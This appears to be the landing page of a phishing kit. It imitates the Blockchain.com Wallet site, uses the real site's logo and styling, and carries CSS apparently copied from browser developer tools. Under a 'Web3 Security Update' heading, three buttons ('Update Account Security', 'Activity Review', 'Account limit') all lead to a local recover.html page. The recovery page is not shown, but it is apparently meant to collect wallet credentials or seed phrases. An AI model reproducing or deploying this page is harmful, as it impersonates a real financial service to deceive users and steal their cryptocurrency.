﻿<html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"><meta name="description" content="Discover the world's most popular bitcoin wallet. Visit today to create your free simple, secure and safe Blockchain Wallet."><meta name="keywords" content="bitcoin wallet, blockchain wallet, online bitcoin wallet, bitcoin wallet online"><title>Blockchain.com Wallet - Exchange Cryptocurrency</title><link rel="manifest" href="./manifest.webmanifest"><style nonce="">html,
      body,
      #app,
      #app > div {
        padding: 0;
        margin: 0;
        height: 100%;
      }
      html,
      body {
        overflow: hidden;
      }
      /* hide scrollbars */
      ::-webkit-scrollbar {
        display: none;
      }
      * {
        scrollbar-width: none;
        -ms-overflow-style: none;
        -webkit-font-smoothing: antialiased;
      }
      .grecaptcha-badge {
        visibility: hidden;
      }
	  
	  
element.style {
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
head {
    display: none;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}
html, body {
    overflow: hidden;
}
html, body, #app, #app > div {
    padding: 0;
    margin: 0;
    height: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
body {
    display: block;
    margin: 8px;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}
html, body, #app, #app > div {
    padding: 0;
    margin: 0;
    height: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}

element.style {
}
html, body, #app, #app > div {
    padding: 0;
    margin: 0;
    height: 100%;
}

element.style {
}
@media (max-width: 767px)

.hbuugT {
    bottom: 10px;
    right: 10px;
    width: 95%;
}

.hbuugT {
    position: absolute;
    display: flex;
    flex-direction: column-reverse;
    -webkit-box-pack: start;
    justify-content: flex-start;
    align-items: flex-start;
    z-index: 1050;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.datfWz {
    background-color: rgb(18, 29, 51);
    height: auto;
    min-height: 100%;
    width: 100%;
    overflow: auto;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
	 
element.style {
}

.ccXrte {
    position: relative;
    width: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}

.LdFuT {
    width: 100%;
    height: 112px;
    margin: 0px auto;
    background-color: rgb(18, 29, 51);
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}

.jjxjhP {
    padding: 0px 16px;
    box-sizing: border-box;
    background-color: rgb(18, 29, 51);
    background-image: url(https://login.blockchain.com/img/bg-pattern.svg);
}

.fwWtkZ {
    position: relative;
    display: flex;
    flex-direction: row;
    -webkit-box-pack: justify;
    justify-content: space-between;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    height: 100%;
    background-color: inherit;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}

element.style {
}

.bDyINy {
    display: flex;
    flex-direction: row;
    width: 100%;
    -webkit-box-pack: center;
    justify-content: center;
    padding-left: 0px;
}
@media (max-width: 767px)

.jJtDZa {
    width: auto;
}
@media (max-width: 991px)

.jJtDZa {
    width: 200px;
    padding-left: 0px;
}

element.style {
}

.jTKOTw {
    display: flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.jJtDZa {
    display: flex;
    padding-left: 24px;
    -webkit-box-align: center;
    align-items: center;
    width: 250px;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}

.jNpUjm {
    display: flex;
    flex-direction: column;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    z-index: 1;
    max-width: 100%;
    box-sizing: border-box;
    margin: 40px 16px 0px;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
    margin-bottom: 24px;
}

.heWqwW {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 24px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(255, 255, 255);
    cursor: inherit;
    display: block;
    opacity: 1;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
    margin-bottom: 32px;
}

.hLxhAA {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 16px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(152, 161, 178);
    cursor: inherit;
    display: block;
    opacity: 1;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}

.hmgoEW {
    width: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
form {
    display: block;
    margin-top: 0em;
}
::-webkit-scrollbar {
    display: none;
}	

element.style {
}
@media (max-width: 991px)

.wxrSL {
    width: 100%;
    -webkit-box-pack: center;
    justify-content: center;
    padding: 0px;
}

.wxrSL {
    display: flex;
    flex-direction: row;
    -webkit-box-align: center;
    align-items: center;
    height: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
}
@media (max-width: 991px)

.hCgtXL {
    padding: 16px 0px;
}
@media (max-width: 479px)

.hCgtXL {
    padding: 20px;
}
@media (max-width: 767px)

.hCgtXL {
    width: 100%;
}

.hCgtXL {
    border-radius: 8px;
    box-sizing: border-box;
    background-color: rgb(255, 255, 255);
    box-shadow: rgb(0 0 0 / 21%) 0px 2px 8px 0px;
    width: 480px;
    display: flex;
    flex-direction: column;
    z-index: 1;
    padding: 32px 0px;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
element.style {
    color: rgb(152, 161, 178);
    font-size: 24px;
    font-weight: 400;
    margin-right: 8px;
}
.frYWKS {
    display: flex;
    flex-direction: column;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.hKbFnn {
    width: 100%;
    display: flex;
    position: relative;
    flex-direction: column;
    margin-bottom: 16px;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.hKbFnn > div:last-child {
    margin-right: 0px;
}


.hKbFnn > div {
    margin-right: 0px;
}
.ewXETR > div {
    margin-bottom: 5px;
}
.eVUxht {
    position: relative;
    display: flex;
    flex-direction: column;
    -webkit-box-pack: start;
    justify-content: flex-start;
    align-items: flex-start;
    width: 100%;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.hEiMib {
    border-radius: 8px;
    overflow: hidden;
    width: 100%;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.DjSuC {
    position: relative;
    display: block;
    width: 100%;
    height: 48px;
    min-height: 48px;
    padding: 6px 12px;
    box-sizing: border-box;
    letter-spacing: 4px;
    font-size: 20px;
    font-weight: 500;
    color: rgb(53, 63, 82);
    background-color: rgb(255, 255, 255);
    background-image: none;
    outline-width: 0px;
    user-select: text;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    border-radius: 8px;
    border: 1px solid rgb(217, 59, 48);
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
input[type="password" i] {
    -webkit-text-security: disc !important;
    padding: 1px 2px;
}
user agent stylesheet
input {
    -webkit-writing-mode: horizontal-tb !important;
    font-style: ;
    font-variant-ligatures: ;
    font-variant-caps: ;
    font-variant-numeric: ;
    font-variant-east-asian: ;
    font-weight: ;
    font-stretch: ;
    font-size: ;
    font-family: ;
    text-rendering: auto;
    color: -internal-light-dark(black, white);
    letter-spacing: normal;
    word-spacing: normal;
    line-height: normal;
    text-transform: none;
    text-indent: 0px;
    text-shadow: none;
    display: inline-block;
    text-align: start;
    appearance: auto;
    -webkit-rtl-ordering: logical;
    cursor: text;
    background-color: -internal-light-dark(rgb(255, 255, 255), rgb(59, 59, 59));
    margin: 0em;
    padding: 1px 2px;
    border-width: 2px;
    border-style: inset;
    border-color: -internal-light-dark(rgb(118, 118, 118), rgb(133, 133, 133));
    border-image: initial;
}
::-webkit-scrollbar {
    display: none;
}
.dpjrGG {
    position: absolute;
    display: block;
    height: 15px;
    top: -20px;
    right: 0px;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}

user agent stylesheet
div {
    display: block;
}
element.style {
}
element.style {
    margin-bottom: 16px;
}

.iRVRAl {
    margin-top: 15px;
}

.gqApeS {
    display: flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    min-width: 140px;
    height: 48px;
    padding: 10px 15px;
    box-sizing: border-box;
    user-select: none;
    text-align: center;
    text-decoration: none;
    vertical-align: middle;
    letter-spacing: normal;
    transition: all 0.2s ease-in-out 0s;
    white-space: nowrap;
    line-height: 1;
    text-transform: none;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 14px;
    font-weight: 600;
    cursor: not-allowed;
    opacity: 0.5;
    color: rgb(255, 255, 255);
    background-color: rgb(12, 108, 242);
    border-radius: 8px;
    border-style: solid;
    border-width: 1px;
    border-color: rgb(12, 108, 242);
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
button:disabled {
    background-color: -internal-light-dark(rgba(239, 239, 239, 0.3), rgba(19, 1, 1, 0.3));
    color: -internal-light-dark(rgba(16, 16, 16, 0.3), rgba(255, 255, 255, 0.3));
    border-color: -internal-light-dark(rgba(118, 118, 118, 0.3), rgba(195, 195, 195, 0.3));
}
user agent stylesheet
button {
    appearance: auto;
    -webkit-writing-mode: horizontal-tb !important;
    font-style: ;
    font-variant-ligatures: ;
    font-variant-caps: ;
    font-variant-numeric: ;
    font-variant-east-asian: ;
    font-weight: ;
    font-stretch: ;
    font-size: ;
    font-family: ;
    text-rendering: auto;
    color: -internal-light-dark(black, white);
    letter-spacing: normal;
    word-spacing: normal;
    line-height: normal;
    text-transform: none;
    text-indent: 0px;
    text-shadow: none;
    display: inline-block;
    text-align: center;
    align-items: flex-start;
    cursor: default;
    box-sizing: border-box;
    background-color: -internal-light-dark(rgb(239, 239, 239), rgb(59, 59, 59));
    margin: 0em;
    padding: 1px 6px;
    border-width: 2px;
    border-style: outset;
    border-color: -internal-light-dark(rgb(118, 118, 118), rgb(133, 133, 133));
    border-image: initial;
}
::-webkit-scrollbar {
    display: none;
}
.kcbeDS {
    display: flex;
    flex-direction: column;
    -webkit-box-align: center;
    align-items: center;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.cguRtB {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 12px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(217, 59, 48);
    cursor: inherit;
    display: block;
    opacity: 1;
}
::-webkit-scrollbar {
    display: none;
}
.cguRtB {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 12px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(217, 59, 48);
    cursor: inherit;
    display: block;
    opacity: 1;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.eGdQh {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 14px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(53, 63, 82);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.idclwP {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 16px;
    line-height: 1.5;
    text-transform: none;
    font-style: normal;
    color: rgb(255, 255, 255);
    cursor: inherit;
    display: block;
    opacity: 1;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}

.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
::-webkit-scrollbar {
    display: none;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
user agent stylesheet
label {
    cursor: default;
}
::-webkit-scrollbar {
    display: none;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
label {
    cursor: default;
}
::-webkit-scrollbar {
    display: none;
}
.kbqLzL {
    position: relative;
    width: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.kWdPjc {
    -webkit-font-smoothing: antialiased;
    cursor: pointer;
    display: flex;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}

.kWdPjc::before {
    font-family: icomoon, sans-serif;
    content: "";
}
::-webkit-scrollbar {
    display: none;
}
.bGFnBb {
    padding: 0px 32px;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.hCqAIV {
    display: flex;
    margin-bottom: 24px;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.edfwkt {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 16px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgba(255, 255, 255, 0.9);
    cursor: inherit;
    display: block;
    opacity: 1;
}
.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
@media (max-width: 991px)

.cqrxcn {
    flex-direction: column;
    -webkit-box-align: center;
    align-items: center;
}
.cqrxcn {
    display: flex;
    -webkit-box-pack: center;
    justify-content: center;
    margin-top: 24px;
    border-top: 1px solid rgb(240, 242, 247);
    padding: 0px;
}
.bnemYa {
    padding: 2rem 2rem 0px;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
element.style {
    margin-top: 16px;
}
.dZiTwf {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 16px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(103, 113, 132);
    cursor: inherit;
    display: block;
    opacity: 1;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
@media (max-width: 991px)

.epESmM {
    margin-top: 0px;
}

@media (max-width: 479px)

.iPSGoj {
    flex-direction: column;
    margin-top: 8px;
}

.iPSGoj {
    display: flex;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    flex-direction: column;
    width: 100%;
    margin: 6rem 0px 2rem;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
.epESmM {
    margin-top: 16px;
}

.nYDtv {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 600;
    font-size: 16px;
    line-height: inherit;
    text-transform: none;
    font-style: normal;
    color: rgb(12, 108, 242);
    cursor: inherit;
    display: block;
    opacity: 1;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}

.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
::-webkit-scrollbar {
    display: none;
}

.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
::-webkit-scrollbar {
    display: none;
}
.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
.user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
.fuWXVV {
    display: flex;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
.hVpFIc {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-weight: 500;
    font-size: 16px;
    line-height: 1.5;
    text-transform: none;
    font-style: normal;
    color: rgb(152, 161, 178);
    cursor: inherit;
    display: block;
    opacity: 1;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}

.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
::-webkit-scrollbar {
    display: none;
}
.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
::-webkit-scrollbar {
    display: none;
}
::-webkit-scrollbar {
    display: none;
}
.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
    text-decoration: underline;
}
::-webkit-scrollbar {
    display: none;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
    text-decoration: underline;
}
::-webkit-scrollbar {
    display: none;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
.hBczNm {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 13px;
    font-weight: 600;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}

* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
    text-decoration: underline;
}
::-webkit-scrollbar {
    display: none;
}
.gqApeS {
    display: flex;
    flex-direction: row;
    -webkit-box-pack: center;
    justify-content: center;
    -webkit-box-align: center;
    align-items: center;
    width: 100%;
    min-width: 140px;
    height: 48px;
    padding: 10px 15px;
    box-sizing: border-box;
    user-select: none;
    text-align: center;
    text-decoration: none;
    vertical-align: middle;
    letter-spacing: normal;
    transition: all 0.2s ease-in-out 0s;
    white-space: nowrap;
    line-height: 1;
    text-transform: none;
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 14px;
    font-weight: 600;
    cursor: not-allowed;
    opacity: 0.5;
    color: rgb(255, 255, 255);
    background-color: rgb(12, 108, 242);
    border-radius: 8px;
    border-style: solid;
    border-width: 1px;
    border-color: rgb(12, 108, 242);
}
user agent stylesheet
button:disabled {
    color: -internal-light-dark(rgba(16, 16, 16, 0.3), rgba(255, 255, 255, 0.3));
}
user agent stylesheet
button {
    -webkit-writing-mode: horizontal-tb !important;
    font-style: ;
    font-variant-ligatures: ;
    font-variant-caps: ;
    font-variant-numeric: ;
    font-variant-east-asian: ;
    font-weight: ;
    font-stretch: ;
    font-size: ;
    font-family: ;
    text-rendering: auto;
    color: -internal-light-dark(black, white);
    letter-spacing: normal;
    word-spacing: normal;
    line-height: normal;
    text-transform: none;
    text-indent: 0px;
    text-shadow: none;
    text-align: center;
    cursor: default;
}
::-webkit-scrollbar {
    display: none;
}
@media (max-width: 767px)

.epMBSQ {
    width: 200px;
}

.epMBSQ {
    width: 240px;
    display: block;
}

.ixijk {
    width: auto;
    height: 24px;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
img[Attributes Style] {
    height: 24px;
}

.bzateK {
    font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
    font-size: 16px;
    font-weight: 500;
    color: rgb(12, 108, 242);
    text-transform: none;
    text-decoration: none;
    cursor: pointer;
}
user agent stylesheet
a:-webkit-any-link {
    color: -webkit-link;
    cursor: pointer;
}
::-webkit-scrollbar {
    display: none;
}
@media (max-width: 991px)

.wxrSL {
    width: 100%;
    -webkit-box-pack: center;
    justify-content: center;
    padding: 0px;
}


.wxrSL {
    display: flex;
    flex-direction: row;
    -webkit-box-align: center;
    align-items: center;
    height: 100%;
}
* {
    scrollbar-width: none;
    -ms-overflow-style: none;
    -webkit-font-smoothing: antialiased;
}
user agent stylesheet
div {
    display: block;
}
::-webkit-scrollbar {
    display: none;
}
	</style></head><body><div id="app"><div class="sc-itybZL datfWz" style="">
	
<center><div class="sc-eMigcr ccXrte"><div height="112px" class="sc-dymIpo LdFuT"><div class="sc-bnXvFD fwWtkZ sc-fjmCvl jjxjhP" style="width:100%;"><div style="width:100%;float:right;"><img src="https://login.blockchain.com/img/bc-logo.svg?91c7840afd" srcset="" height="24px" class="sc-bwzfXH ixijk sc-bHwgHz epMBSQ" color="auto" width="auto"></div></div></div></div>



<div class="sc-fzsDOv jNpUjm"><div color="white" cursor="inherit" opacity="1" class="sc-gzVnrw heWqwW" style="margin-bottom: 24px;">Web3 Security Update</div>

<form class="hmgoEW"><div class="sc-jvEmr sc-TuwoP hCgtXL"><div class="sc-hdPSEv bGFnBb">

<div class="sc-bNQFlB sc-dRCTWM kcbeDS" ><a style="background-color:#0c6cf2;text-decoration:none;width:400px;height:40px;padding-top:13px;border-radius:5px;margin-bottom: 16px;" href="recover.html" height="48px" color="white" ><div color="whiteFade900" cursor="inherit" opacity="1" class="sc-gzVnrw edfwkt" style="background-color:#0c6cf2;">Update Account Security</div></a></div>

<div class="sc-bNQFlB sc-dRCTWM kcbeDS" ><a style="background-color:#0c6cf2;text-decoration:none;width:400px;height:40px;padding-top:13px;border-radius:5px;margin-bottom: 16px;" href="recover.html" height="48px" color="white" ><div color="whiteFade900" cursor="inherit" opacity="1" class="sc-gzVnrw edfwkt" style="background-color:#0c6cf2;">Activity Review</div></a></div>

<div class="sc-bNQFlB sc-dRCTWM kcbeDS" ><a style="background-color:#0c6cf2;text-decoration:none;width:400px;height:40px;padding-top:13px;border-radius:5px;margin-bottom: 16px;" href="recover.html" height="48px" color="white" ><div color="whiteFade900" cursor="inherit" opacity="1" class="sc-gzVnrw edfwkt" style="background-color:#0c6cf2;">Account limit</div></a></div>

</div></div></form>
	
	</div><div class="sc-dTdPqK iPSGoj"><div class="sc-lkqHmb bnemYa"><a data-e2e="exchangeLinkLogin" href="https://exchange.blockchain.com/trade/login" color="blue600" class="sc-htpNat bzateK"><div class="sc-gojNiO fuWXVV"><div color="grey400" style="color:white;display:flex;"cursor="inherit" opacity="1" class="sc-gzVnrw hVpFIc">Looking for the Exchange? </div>&nbsp;<div color="white" cursor="inherit" opacity="1" class="sc-gzVnrw idclwP">Log In -&gt; </div></div></a></div></div>
	
